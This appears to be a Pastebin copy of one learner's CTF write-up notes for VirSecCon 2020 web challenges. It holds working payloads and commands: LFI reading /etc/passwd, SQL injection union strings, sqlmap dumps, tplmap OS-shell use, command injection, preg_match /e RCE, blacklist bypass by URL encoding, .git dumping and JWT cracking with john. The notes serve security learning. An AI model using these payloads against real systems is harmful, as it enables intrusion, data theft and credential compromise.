API tools faq
paste
Royal_Rose_Red_Lay

VirSecCon_CTF_challenge

Royal_Rose_Red_Lay
Sep 21st, 2020 (edited)
103
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.46 KB | None | 0 0
raw download clone embed print report
  1. #Today Knowledge (shellshock vulnerability) 9/22/2020
  2. #### https://blog.cloudflare.com/inside-shellshock/
  3. # Write up for Viseccon CTF
  4. #### https://github.com/Yash-Amin/virsecconCTF/tree/master/Web
  5. #### https://www.youtube.com/watch?v=_d82Ia0RV0w
  6.  
  7. 9/22/2020
  8. # Countdown
  9. Firstly click the link and the alert was appear. You are too late !!!!!!!
  10. Now, i pass the burpsuite and increase the cookies value. Now, i get the flag!
  11.  
  12. * view the source of any PHP file
  13. ** php://filter/convert.base64-encode/resource=index
  14. ** fopen wrappers with the following functions: include, include_once, require, require_once.
  15.  
  16. # Hot Access
  17. RC --> View Page Source
  18. I found the links that were used to load php files. For example --> <a href="http://jh2i.com:50016/?m=modules/date.php" . So, this may be LFI and i change the query /etc/passwd or in window \etc\passwd <<<< ?m=/etc/passwd >>>> This will show etc/passwd!!
  19. The next step is two ways. One way is--> to try the ?m=.htacess or use php://filter/convert.base64-encode/resource=index.php
  20. 1st way --> to enter .htacess and you can see the directory and i put this after the parameter --> ?m=/var/www/html/sshh_dont_tell_i_hid_the_flag_here and i get the flag!
  21. 2nd way --> ?m= php://filter/convert.base64-encode/resource=index.php ... Brute force with lfi.txt ---> .htacess and i found the directory and paste this directory after the parameter. Now, i get the flag.
  22.  
  23. 9/23/2020
  24. **strcmp is a function created to compare strings.** we use array to bypass strcmp string !!! flag[]=""
  25. # PHPJuggler
  26. In view source, i see the function of strcmp!! So, i use the burp and bypass the strcmp. Therefore, i change flag=anything to flag[]=anything. TAN TANNN TAN !!!!!!!
  27.  
  28. ** {{ ... }} for Expressions to print to the template output "jinja2 template"
  29. ** Tplmap – Open Source Tool to Scan For Server Side Template Injection Vulnerabilities
  30. ** git clone https://github.com/epinna/tplmap
  31. python tplmap.py -u url -d "variable=*"
  32.  
  33. # Mask
  34. Hint::: Flask application ---> So, i test {{2*5}}, it is work!!. Therefore, i apply the tplmap for server side template injection!!
  35. python tplmap -u url -d "mask=*" # mask = varialble
  36. Return tplmap providing one of the following option. !! --os-shell and then python tplmap -u url -d "mask=*" --os-shell
  37. Run commands on the operating system
  38. $ls
  39. $cat flag.txt BOMMMMM!!!!!!!!!
  40.  
  41. # Character Web Shell
  42. I pass the burp and i saw the parameter. so, I test the parameter with ?c=ls or ?c=;ls it is work. i scroll the output and i found the flag.txt. So, i read the flag.txt. http://...../flag.txt, in another way, ?c=cat */*. W0W!!!! Wowwww!!!! Wow!
  43.  
  44. # Sequetilis
  45. I get the new idea in this challenge! If i see the search form, i test whether it is sql or not!!!
  46. ## ' or 1=1 -- - ## '+or+'1'='1 Then, i want to know the number of column and i write this command --> ' order by 1 -- - and 2 and 3,4
  47. #### ' union select 1,2,3 -- - # ' union select table_schema,2,table_name from information_schema.tables-- - OR
  48. ## ' union select group_concat(table_name),2,3 from information_schema.tables -- -
  49. #### ' union select column_name,2,3 from information_schema.columns -- - OR
  50. ## ' union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database()-- -
  51. #### ' union select value,2,3 from flag -- -
  52. ## ' union select group_concat(column_name),2,3 from information_schema.columns where column_name='flag' -- -
  53. ## ' union select value,2,3 from flag -- -
  54.  
  55. **** https://location-href.com/web-security/
  56. 9/24/2020
  57. ** GitDumper
  58. * Downloading .git repositories from the web server which do not have directory listing enabled.
  59. usage --> ./gitdumper.sh -h
  60.  
  61. # Dairy Products
  62. git milk?
  63. So, i try the url with git :) /.git like "http://142.93.3.19:50008/.git"
  64.  
  65. I use gitdumper to download the repository!!
  66. ### ./gitdumper.sh http://142.93.3.19:50008/.git dump # if u have a file, u first delete this file. # rm -r demo. After downloading completed:
  67. ### cd ../Extactor ## ls ## if having a file, u should delete. #rm -r output
  68. ### ./extractor.sh ../Dumper/dump/ output
  69. ### cd output ### grep -rn "LLS{" OHHHHHHHHHHHHHHHHH!!!!!!!!! SoOOOO DiZzy !!!!!!!!!!!!!!!!!!!
  70.  
  71. # Irregular Function
  72. **preg_match -> regular expression match! ** preg_match(/php/i ---> i means case-insensitive search !!! @pattern part
  73. In this challenge, I notice that the regex function. I know that preg_match function was vulnerable to remote code execution (RCE).
  74. So, by pass this function with /e in pattern like /quick/e. And try to read /etc/passwd using system function. system('/etc/passwd') and then system('ls -al').As a result, this found the irregular word and read like system('cat irregular words'). Another way! in burp suite pattern = /(.*)/e replace = `ls+-la` text = test and for file read GET /irregular word
  75.  
  76. # GET Encoded
  77. I visit the link and i found this only word. "Machine hunts for more than humans do"
  78. Firstly, i try that url --> jh2i.com:50013/robots.txt. Wow!! Disallow: /?debug >>>> jh2i.com:50013/?debug >>>
  79. $blacklist=assert|system|passthru|exec.... >> and we will check-> if (preg_match("/$blacklist/i",$_SERVER['REQUEST_URL'])){die("Go away hacker');} -> So, i use Burp and GET /?system=ls HTTP/1.1 and Send. But, i see error. URL decode in this system function in Decode tab and URL encode --> and copy and paste GET /?%73%79%73%74%65%6d=ls. i found ----.php file and GET /?%73%79%73%74%65%6d=----.php and i found error again. Finally, I change the php file to URL encode. BOMMM!!!!!!!!!!!!!!
  80.  
  81. # Eyeless
  82. Firstly, i test the username ==> ' or 1=1 -- - and password=1111 and it appears Good Job. But no flag HERE!! Dam! I know that it is sql injection. Then, i pass the developer tools' and take params. Now, i use sql map ## sqlmap -u "url" --data="param" --dbs
  83. if more faster than that ## sqlmap -u "url" --data="param" --dbs --time-sec=2 threads 10
  84. Skip --> # sqlmap -u "url" --data="param" -D eyeless -T users --dump --time-sec=2
  85. ARRR!!! I get it.
  86.  
  87. # JaWT
  88. This challenge is about JSON Web Token. This challenge is need to change the other users to admin. But we changing the value to admin without knowing the secret key is not possible. For finding the secret key, we need to use john the ripper in linux.
  89. jwt debugger -> jwt.io(in browser)
  90. 1. Copy cookies value and Paste in Encoded in jwt debugger -> WE see the three parts ->payload,header,signature
  91. 2. Copy the cookies and save as something.txt
  92. 3. #john ./picoJWT-textfile.txt --wordlist=./rockyou.txt (/usr/share/wordlists/rockyou.txt)
  93. OR
  94. 3. john something.txt -> john -show something.txt
  95.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!